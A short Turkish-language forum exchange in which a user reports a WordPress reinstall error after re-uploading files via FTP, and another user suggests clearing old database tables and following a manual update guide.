  Linux adlı üyeden alıntı
  Hocam tüm wp dosyalarını sildim, yeniden attım ftp ye - config ayarlarını yaptım ama hata alıyorum.

  Görünün o ki WordPress’i çoktan yüklemişsiniz. Tekrar yüklemek için lütfen ilk önce eski veritabanı tablolarınızı temizleyin.
  Hocam googlede Manuel wp guncelleme diye aratıp adımları kontrol edin. DOğru yaptıgınızdan emin olun.
  Kurulu olduğun Makinalar YANSIN google Efendi..